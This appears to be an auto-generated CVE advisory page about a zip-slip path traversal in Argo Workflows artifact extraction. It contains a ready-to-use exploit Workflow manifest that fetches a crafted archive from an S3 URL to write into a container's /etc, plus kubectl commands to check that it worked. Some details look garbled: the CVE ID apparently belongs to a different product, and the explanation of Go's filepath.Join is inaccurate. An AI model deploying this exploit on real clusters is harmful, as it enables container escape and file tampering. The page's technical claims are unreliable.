Argo Workflows, Path Traversal, CVE-2022-41352 (Critical)

By /

Listen to this Post

The vulnerability exists in the `untar()` function within the artifact extraction process. When handling a malicious tar.gz archive, the function uses `filepath.Join(dest, filepath.Clean(header.Name))` to determine the final file path. An attacker can craft an archive entry with a name like ../../../../../../../../../..//mainctrfs/etc/zipslip-poc. The `filepath.Clean()` function normalizes this path, but if it results in an absolute path (e.g., /mainctrfs/etc/zipslip-poc), the `filepath.Join()` operation will ignore the intended base directory (/work/tmp). This causes the file to be written to an absolute path on the filesystem. Combined with a shared volume mount that mirrors the wait container’s `/mainctrfs/etc` to the main container’s /etc, this allows arbitrary file creation in critical system directories, bypassing container isolation.
Platform: Argo Workflows
Version: < 3.4.5
Vulnerability: Path Traversal
Severity: Critical

date: 2022-10-24

Prediction: 2022-11-14

What Undercode Say:

Find the latest Workflow and its Pod
NS=default
WF=$(kubectl get wf -n "$NS" --sort-by=.metadata.creationTimestamp --no-headers | awk 'END{print $1}')
POD=$(kubectl get pod -n "$NS" -l workflows.argoproj.io/workflow="$WF" --no-headers | awk 'END{print $1}')
Connect to the main container to check for exploit success
kubectl exec -it -n "$NS" "$POD" -c main -- bash
cd /etc/
ls -l zipslip-ok.txt
cat zipslip-ok.txt

exploit.yaml
apiVersion: argoproj.io/v1alpha1
kind: Workflow
metadata:
generateName: zipslip-
spec:
entrypoint: main
templates:
- name: main
container:
image: ubuntu:22.04
command: ["sh"]
args: ["-c", "echo 'Starting container'; sleep 3000"]
volumeMounts:
- name: etcvol
mountPath: /etc
inputs:
artifacts:
- name: evil
path: /work/tmp
archive:
tar: {}
http:
url: "https://zipslip-s3.s3.amazonaws.com/etc-poc.tgz"
volumes:
- name: etcvol
emptyDir: {}

How Exploit:

Create malicious tar.gz

Upload to S3

Deploy malicious Workflow

Execute workflow

File written to /etc

Protection from this CVE

Update Argo Workflows

Validate artifact paths

Use security policies

Impact:

Container isolation bypass

System file overwrite

Privilege escalation potential

Persistent access risk

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top